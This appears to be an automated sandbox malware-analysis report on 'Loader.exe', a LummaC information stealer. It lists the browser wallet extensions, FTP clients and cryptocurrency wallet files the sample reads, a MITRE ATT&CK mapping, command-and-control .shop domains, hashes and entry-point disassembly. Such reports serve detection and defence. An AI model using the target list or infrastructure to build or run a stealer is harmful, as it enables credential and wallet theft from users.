                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: Yara matchFile source: Process Memory Space: Loader.exe PID: 2588, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: Loader.exe PID: 2588, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation
                1
                DLL Side-Loading
                211
                Process Injection
                21
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Screen Capture
                21
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                211
                Process Injection
                LSASS Memory1
                Query Registry
                Remote Desktop Protocol1
                Archive Collected Data
                2
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Deobfuscate/Decode Files or Information
                Security Account Manager241
                Security Software Discovery
                SMB/Windows Admin Shares4
                Data from Local System
                113
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information
                NTDS21
                Virtualization/Sandbox Evasion
                Distributed Component Object Model3
                Clipboard Data
                Protocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Software Packing
                LSA Secrets1
                Process Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                File and Directory Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem33
                System Information Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Loader.exe45%ReversingLabsWin32.Trojan.Generic
                Loader.exe39%VirustotalBrowse
                Loader.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://fancywaxxers.shop:443/apiackages100%Avira URL Cloudmalware
                https://fancywaxxers.shop/apil100%Avira URL Cloudmalware
                https://fancywaxxers.shop/AA100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                fancywaxxers.shop
                104.21.48.1
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  rabidcowse.shopfalse
                    high
                    wholersorie.shopfalse
                      high
                      fancywaxxers.shopfalse
                        high
                        cloudewahsj.shopfalse
                          high
                          noisycuttej.shopfalse
                            high
                            nearycrepso.shopfalse
                              high
                              https://fancywaxxers.shop/apifalse
                                high
                                framekgirus.shopfalse
                                  high
                                  tirepublicerj.shopfalse
                                    high
                                    abruptyopsn.shopfalse
                                      high
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabLoader.exe, 00000002.00000003.1690692563.00000000052C9000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1690621567.00000000052CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://duckduckgo.com/ac/?q=Loader.exe, 00000002.00000003.1690692563.00000000052C9000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1690621567.00000000052CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgLoader.exe, 00000002.00000003.1715281830.000000000528B000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoLoader.exe, 00000002.00000003.1690692563.00000000052C9000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1690621567.00000000052CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://fancywaxxers.shop/apilLoader.exe, 00000002.00000003.2381124691.00000000030A5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2921919772.00000000030A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.Loader.exe, 00000002.00000003.1715281830.000000000528B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Loader.exe, 00000002.00000003.1690692563.00000000052C9000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1690621567.00000000052CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0Loader.exe, 00000002.00000003.1713923065.00000000052B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaLoader.exe, 00000002.00000003.1715281830.000000000528B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Loader.exe, 00000002.00000003.1690692563.00000000052C9000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1690621567.00000000052CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://ocsp.rootca1.amazontrust.com0:Loader.exe, 00000002.00000003.1713923065.00000000052B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Loader.exe, 00000002.00000003.1702857705.00000000052D7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1691092298.0000000005323000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1703001008.00000000052D7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1691247767.00000000052D7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1691350994.00000000052D7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1702905282.00000000052D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Loader.exe, 00000002.00000003.1702857705.00000000052D7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1691092298.0000000005323000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1703001008.00000000052D7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1691247767.00000000052D7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1691350994.00000000052D7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1702905282.00000000052D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.ecosia.org/newtab/Loader.exe, 00000002.00000003.1690692563.00000000052C9000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1690621567.00000000052CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://fancywaxxers.shop:443/apiackagesLoader.exe, 00000002.00000003.1745425730.0000000005289000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1752143168.000000000528A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brLoader.exe, 00000002.00000003.1715024195.00000000053A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://ac.ecosia.org/autocomplete?q=Loader.exe, 00000002.00000003.1690692563.00000000052C9000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1690621567.00000000052CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgLoader.exe, 00000002.00000003.1715281830.000000000528B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiLoader.exe, 00000002.00000003.1715281830.000000000528B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://x1.c.lencr.org/0Loader.exe, 00000002.00000003.1713923065.00000000052B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://x1.i.lencr.org/0Loader.exe, 00000002.00000003.1713923065.00000000052B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallLoader.exe, 00000002.00000003.1691247767.00000000052B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchLoader.exe, 00000002.00000003.1690692563.00000000052C9000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1690621567.00000000052CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://support.microsofLoader.exe, 00000002.00000003.1691092298.0000000005325000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://fancywaxxers.shop/AALoader.exe, 00000002.00000003.1689482955.0000000003035000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  http://crt.rootca1.amazontrust.com/rootca1.cer0?Loader.exe, 00000002.00000003.1713923065.00000000052B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesLoader.exe, 00000002.00000003.1691247767.00000000052B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://fancywaxxers.shop/Loader.exe, 00000002.00000002.2921671681.000000000301C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1745521965.000000000301C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://support.mozilla.org/products/firefoxgro.allLoader.exe, 00000002.00000003.1715024195.00000000053A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Loader.exe, 00000002.00000003.1690692563.00000000052C9000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1690621567.00000000052CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://fancywaxxers.shop:443/apiLoader.exe, 00000002.00000003.1751671802.0000000003087000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94Loader.exe, 00000002.00000003.1715281830.000000000528B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                • No. of IPs < 25%
                                                                                                • 25% < No. of IPs < 50%
                                                                                                • 50% < No. of IPs < 75%
                                                                                                • 75% < No. of IPs
                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                104.21.48.1
                                                                                                fancywaxxers.shopUnited States
                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                Analysis ID:1582939
                                                                                                Start date and time:2025-01-01 02:56:04 +01:00
                                                                                                Joe Sandbox product:CloudBasic
                                                                                                Overall analysis duration:0h 4m 54s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:full
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                Number of analysed new started processes analysed:7
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:0
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Analysis stop reason:Timeout
                                                                                                Sample name:Loader.exe
                                                                                                Detection:MAL
                                                                                                Classification:mal100.troj.spyw.evad.winEXE@4/0@1/1
                                                                                                EGA Information:
                                                                                                • Successful, ratio: 100%
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 96%
                                                                                                • Number of executed functions: 52
                                                                                                • Number of non-executed functions: 120
                                                                                                Cookbook Comments:
                                                                                                • Found application associated with file extension: .exe
                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                TimeTypeDescription
                                                                                                20:56:55API Interceptor8x Sleep call for process: Loader.exe modified
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                104.21.48.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                • twirpx.org/administrator/index.php
                                                                                                SN500, SN150 Spec.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.antipromil.site/7ykh/
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                fancywaxxers.shopLoader.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.80.1
                                                                                                Solara-Roblox-Executor-v3.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.96.1
                                                                                                Delta.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.96.1
                                                                                                SMmAznmdAa.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.48.1
                                                                                                zhMQ0hNEmb.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.112.1
                                                                                                2RxMkSAgZ8.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.64.1
                                                                                                Dl6wuWiQdg.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                • 104.21.112.1
                                                                                                bzzF5OFbVi.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.64.1
                                                                                                x6VtGfW26X.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.112.1
                                                                                                Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.96.1
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                CLOUDFLARENETUShttps://thetollroads.com-wfmo.xyz/usGet hashmaliciousUnknownBrowse
                                                                                                • 104.17.25.14
                                                                                                http://img1.wsimg.com/blobby/go/9b6ed793-452c-4f8f-8f80-6847f4d114d7/downloads/71318864754.pdfGet hashmaliciousUnknownBrowse
                                                                                                • 104.16.123.96
                                                                                                decrypt.exeGet hashmaliciousUnknownBrowse
                                                                                                • 104.21.16.1
                                                                                                decrypt.exeGet hashmaliciousUnknownBrowse
                                                                                                • 104.21.16.1
                                                                                                FW_ Carr & Jeanne Biggerstaff has sent you an ecard.msgGet hashmaliciousUnknownBrowse
                                                                                                • 104.16.123.96
                                                                                                OPRfEWLTto.jsGet hashmaliciousUnknownBrowse
                                                                                                • 104.21.75.126
                                                                                                Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                • 172.67.157.249
                                                                                                ILxa85qCjP.jsGet hashmaliciousUnknownBrowse
                                                                                                • 172.67.175.217
                                                                                                PASS-1234.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.96.1
                                                                                                Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.80.1
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                a0e9f5d64349fb13191bc781f81f42e1Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.48.1
                                                                                                PASS-1234.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.48.1
                                                                                                Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.48.1
                                                                                                Launcher_x64.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.48.1
                                                                                                Solara-Roblox-Executor-v3.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.48.1
                                                                                                Delta.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.48.1
                                                                                                Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.48.1
                                                                                                SMmAznmdAa.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.48.1
                                                                                                zhMQ0hNEmb.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.48.1
                                                                                                2RxMkSAgZ8.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.48.1
                                                                                                No context
                                                                                                No created / dropped files found
                                                                                                File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                Entropy (8bit):7.822383525403777
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                File name:Loader.exe
                                                                                                File size:822'784 bytes
                                                                                                MD5:0792fce4557cae0687a02e5e41be587a
                                                                                                SHA1:1bac30844ed9b13082a7df999518b0cc59759278
                                                                                                SHA256:6e7b661fb3b6610bc026dd050824e7faaf3bd3b5fa0b168d941858fc694ba871
                                                                                                SHA512:b7fb793442afa46c3ba8a3066adaf94453a5324bf717904bb564fde1b14471245e3cd77b6bfff4a5c236551ec4f5ee091121fd6827635c4ddb3394dd627e1426
                                                                                                SSDEEP:12288:h3K1Pp+lMeB8MFA6ln2KKV+FV9cEmRJ3Tn0FA6ln2KKV+FV9cEmRJ3Tn1:lK1PSMZ8A6JoM7cF3gA6JoM7cF3p
                                                                                                TLSH:F905015275C0C0B2C5632677A9F9E7B60A3DBD100B629ACF63C81BB68F316C55734A27
                                                                                                File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....sg.................H........................@.......................................@.....................................(..
                                                                                                Icon Hash:90cececece8e8eb0
                                                                                                Entrypoint:0x40a2e0
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:false
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows cui
                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                DLL Characteristics:DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                Time Stamp:0x6773E4A4 [Tue Dec 31 12:33:40 2024 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:6
                                                                                                OS Version Minor:0
                                                                                                File Version Major:6
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:6
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:019ac8c6e24f80fb88de699b6749f599
                                                                                                Instruction
                                                                                                call 00007FFAA8BF063Ah
                                                                                                jmp 00007FFAA8BF049Dh
                                                                                                mov ecx, dword ptr [004307C0h]
                                                                                                push esi
                                                                                                push edi
                                                                                                mov edi, BB40E64Eh
                                                                                                mov esi, FFFF0000h
                                                                                                cmp ecx, edi
                                                                                                je 00007FFAA8BF0636h
                                                                                                test esi, ecx
                                                                                                jne 00007FFAA8BF0658h
                                                                                                call 00007FFAA8BF0661h
                                                                                                mov ecx, eax
                                                                                                cmp ecx, edi
                                                                                                jne 00007FFAA8BF0639h
                                                                                                mov ecx, BB40E64Fh
                                                                                                jmp 00007FFAA8BF0640h
                                                                                                test esi, ecx
                                                                                                jne 00007FFAA8BF063Ch
                                                                                                or eax, 00004711h
                                                                                                shl eax, 10h
                                                                                                or ecx, eax
                                                                                                mov dword ptr [004307C0h], ecx
                                                                                                not ecx
                                                                                                pop edi
                                                                                                mov dword ptr [00430800h], ecx
                                                                                                pop esi
                                                                                                ret
                                                                                                push ebp
                                                                                                mov ebp, esp
                                                                                                sub esp, 14h
                                                                                                lea eax, dword ptr [ebp-0Ch]
                                                                                                xorps xmm0, xmm0
                                                                                                push eax
                                                                                                movlpd qword ptr [ebp-0Ch], xmm0
                                                                                                call dword ptr [0042E8D8h]
                                                                                                mov eax, dword ptr [ebp-08h]
                                                                                                xor eax, dword ptr [ebp-0Ch]
                                                                                                mov dword ptr [ebp-04h], eax
                                                                                                call dword ptr [0042E894h]
                                                                                                xor dword ptr [ebp-04h], eax
                                                                                                call dword ptr [0042E890h]
                                                                                                xor dword ptr [ebp-04h], eax
                                                                                                lea eax, dword ptr [ebp-14h]
                                                                                                push eax
                                                                                                call dword ptr [0042E920h]
                                                                                                mov eax, dword ptr [ebp-10h]
